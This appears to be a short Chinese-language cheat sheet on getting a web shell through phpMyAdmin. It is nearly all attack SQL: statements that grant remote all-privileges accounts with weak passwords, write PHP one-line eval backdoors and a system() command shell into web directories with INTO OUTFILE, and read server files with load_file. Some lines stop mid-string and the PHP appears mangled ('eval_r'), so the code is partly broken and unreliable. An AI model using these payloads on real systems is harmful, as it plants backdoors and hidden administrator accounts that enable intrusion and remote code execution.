总结PHPmyadmin拿shell

GRANT ALL PRIVILEGES ON *.* TO 'guetsec'@'%' IDENTIFIED BY 'ooxx' WITH GRANT OPTION;

GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY '123456' WITH GRANT OPTION;

CREATE TABLE `mysql`.`study` (`7on` TEXT NOT NULL );
INSERT INTO `mysql`.`study` (`7on` )VALUES ('<?php @eval_r($_POST[7on])?>');
SELECT 7onFROM study INTO OUTFILE 'E:/wamp/www/7.php';
----以上同时执行，在数据库: mysql 下创建一个表名为：study，字段为7on，导出到E:/wamp/www/7.php
    一句话连接密码：7on

读取文件内容：    select load_file('E:/xamp/www/s.php');
写一句话：    select '<?php @eval_r($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/study.php'
cmd执行权限：    select '<?php echo \'<pre class="brush:php;toolbar:false">\';system($_GET[\'cmd\']); echo \'

Create TABLE study (cmd text NOT NULL);
Insert INTO study (cmd) VALUES('<?php eval_r($_POST[cmd])?>');
select cmd from study into outfile 'E:/wamp/www/7.php';
   
Drop TABLE IF EXISTS study;
   
<?php eval_r($_POST[cmd])?>
--------------------------------------------------------------------------------
<?php @eval_r($_POST[cmd])?>
   
CREATE TABLE study(cmd text NOT NULL );# MySQL 返回的查询结果为空(即零行)。
INSERT INTO study( cmd ) VALUES ('<?php eval_r($_POST[cmd])?>');# 影响列数： 1
SELECT cmdFROM study INTO OUTFILE 'E:/wamp/www/7.php';# 影响列数： 1
DROP TABLE IF EXISTS study;# MySQL 返回的查询结果为空(即零行)。

select load_file('E:/xamp/www/study.php');
select '<?php echo \'<pre class="brush:php;toolbar:false">\';system($_GET[\'cmd\']); echo \'